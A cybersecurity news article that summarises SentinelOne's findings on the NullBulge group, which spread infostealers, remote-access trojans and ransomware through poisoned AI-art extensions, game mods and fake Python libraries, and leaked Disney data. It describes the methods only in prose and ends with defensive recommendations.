NullBulge Group Targets AI and Gaming Communities with Innovative Malware Attacks


According to SentinelOne Labs, a new threat actor, the NullBulge group, has emerged between April and June 2024, targeting users in AI-centric application and gaming communities. This group, under the guise of activism and claiming to protect artists from AI threats, has deployed creative and sophisticated methods to distribute malware, revealing motives that seem to extend beyond their proclaimed anti-AI cause.
Malware Campaigns and Distribution MethodsNullBulge has focused on targeting extensions and modifications for widely-used AI-art-related applications and games, delivering various malware payloads. Their primary method involves “poisoning the well,” injecting malicious code into legitimate software distribution mechanisms. They exploit trusted platforms like GitHub, Reddit, and Hugging Face to maximize their reach, announcing their exploits via their own DLS/blog site and occasionally on 4chan threads.
One notable instance involves the compromise of the ComfyUI_LLMVISION extension on GitHub, distributing Python-based malware that exfiltrates data via Discord webhook. Similarly, malicious code was distributed through BeamNG mods on Hugging Face and Reddit. These campaigns resulted in the distribution of malware such as Async RAT and Xworm.
Technical Details and PayloadsThe group’s malware often includes customized LockBit ransomware builds, enhancing the impact of their attacks. Their approach typically involves modifying the ‘requirements.txt’ file to include custom Python wheels, integrating precompiled malicious versions of libraries from Anthropic and OpenAI. For example, the fake OpenAI library (version 1.16.3) included scripts like Fadmino.py, which harvests and logs browser data, and admin.py, which prepares and transmits the data via Discord webhook.
In the compromised GitHub repositories, these scripts work in concert to gather sensitive data, including browser login information and system details, and then transmit it to an external server.
Identified Threats and EntitiesNullBulge has used various identities to distribute their malicious code. One such identity, AppleBotzz, was used on platforms like GitHub and ModLand, leading to speculation about the true relationship between AppleBotzz and NullBulge. The group claims they compromised the original maintainer of the ComfyUI_LLMVISION GitHub repository, using their credentials to post malicious code.
In a statement, NullBulge clarified their stance, suggesting they were distinct from AppleBotzz. However, there remains skepticism about whether these identities are separate or one and the same.
High-Profile LeaksThe group has also targeted high-profile entities. At the end of June 2024, NullBulge announced a leak of information from Disney, including web publishing certificates and assets from the animated series DuckTales. This leak was followed by the release of a massive 1.2TB archive purportedly containing years of Disney’s internal Slack data, obtained through compromised corporate account credentials.
Expert InsightsAyman Abouelwafa, chief technology officer at Hitachi Vantara, highlighted the importance of a robust infrastructure for GenAI: “Enterprises are clearly jumping on the GenAI bandwagon, which is not surprising, but it’s also clear that the foundation for successful GenAI is not yet fully built to fit the purpose and its full potential cannot be realized. Unlocking the true power of GenAI, however, requires a strong foundation with a robust and secure infrastructure that can handle the demands of this powerful technology.”
Implications and RecommendationsThe activities of NullBulge underscore the growing threat of low-barrier-of-entry ransomware and infostealer infections targeting AI-centric games and applications. Their methods, though not new, exploit an emerging target demographic, raising significant concerns for those working with such technologies.
To mitigate the risks posed by groups like NullBulge, organizations should implement stringent security measures, including secure API key management, thorough code review and verification, and regular monitoring of third-party code sources.
As the cybersecurity landscape continues to evolve, vigilance and proactive defense strategies remain crucial in combating these sophisticated threat actors.